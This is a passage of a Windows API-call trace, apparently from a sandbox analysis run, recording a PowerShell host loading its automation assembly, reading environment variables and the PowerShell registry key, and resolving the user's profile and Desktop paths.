halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ace10 | out: lpFileInformation=0x1ace10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.898] SetErrorMode (uMode=0x1) returned 0x1 [0103.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0103.899] SetErrorMode (uMode=0x1) returned 0x1 [0103.899] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ace10 | out: lpFileInformation=0x1ace10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.899] SetErrorMode (uMode=0x1) returned 0x1 [0103.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acc10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0103.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x1acb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0103.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0103.900] SetErrorMode (uMode=0x1) returned 0x1 [0103.900] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ace10 | out: lpFileInformation=0x1ace10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa73b02e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xa73b02e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.900] SetErrorMode (uMode=0x1) returned 0x1 [0103.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0103.900] SetErrorMode (uMode=0x1) returned 0x1 [0103.900] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ace10 | out: lpFileInformation=0x1ace10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa73b02e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xa73b02e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.900] SetErrorMode (uMode=0x1) returned 0x1 [0103.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acc10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0103.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x1acb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0103.902] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1ace70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0103.902] SetErrorMode (uMode=0x1) returned 0x1 [0103.902] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ad0d0 | out: lpFileInformation=0x1ad0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa73b02e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xa73b02e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0103.903] SetErrorMode (uMode=0x1) returned 0x1 [0103.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.938] CoTaskMemAlloc (cb=0x804) returned 0x1f1320 [0103.938] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1f1320, nSize=0x1ad438 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad438) returned 0x1 [0103.938] CoTaskMemFree (pv=0x1f1320) [0103.938] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.938] GetUserNameW (in: lpBuffer=0x26e210, pcbBuffer=0x1ad478 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad478) returned 1 [0103.939] CoTaskMemFree (pv=0x26e210) [0103.939] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c8d1d8*="Available", lpRawData=0x3c8cf68) returned 1 [0103.940] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.940] CoTaskMemFree (pv=0x1b7401c0) [0103.940] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.940] CoTaskMemFree (pv=0x1b7401c0) [0103.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.943] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.943] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0103.943] CoTaskMemFree (pv=0x1b7401c0) [0103.944] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.944] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0103.944] CoTaskMemFree (pv=0x1b7401c0) [0103.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.945] GetCurrentProcessId () returned 0xb0 [0103.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.948] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad458 | out: phkResult=0x1ad458*=0x39c) returned 0x0 [0103.949] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad3dc, lpData=0x0, lpcbData=0x1ad3d8*=0x0 | out: lpType=0x1ad3dc*=0x1, lpData=0x0, lpcbData=0x1ad3d8*=0x56) returned 0x0 [0103.949] CoTaskMemAlloc (cb=0x5a) returned 0x1b7547c0 [0103.949] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad3ac, lpData=0x1b7547c0, lpcbData=0x1ad3a8*=0x56 | out: lpType=0x1ad3ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad3a8*=0x56) returned 0x0 [0103.949] CoTaskMemFree (pv=0x1b7547c0) [0103.949] RegCloseKey (hKey=0x39c) returned 0x0 [0103.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.963] CoTaskMemAlloc (cb=0x104) returned 0x1b7401c0 [0103.963] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7401c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.963] CoTaskMemFree (pv=0x1b7401c0) [0103.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 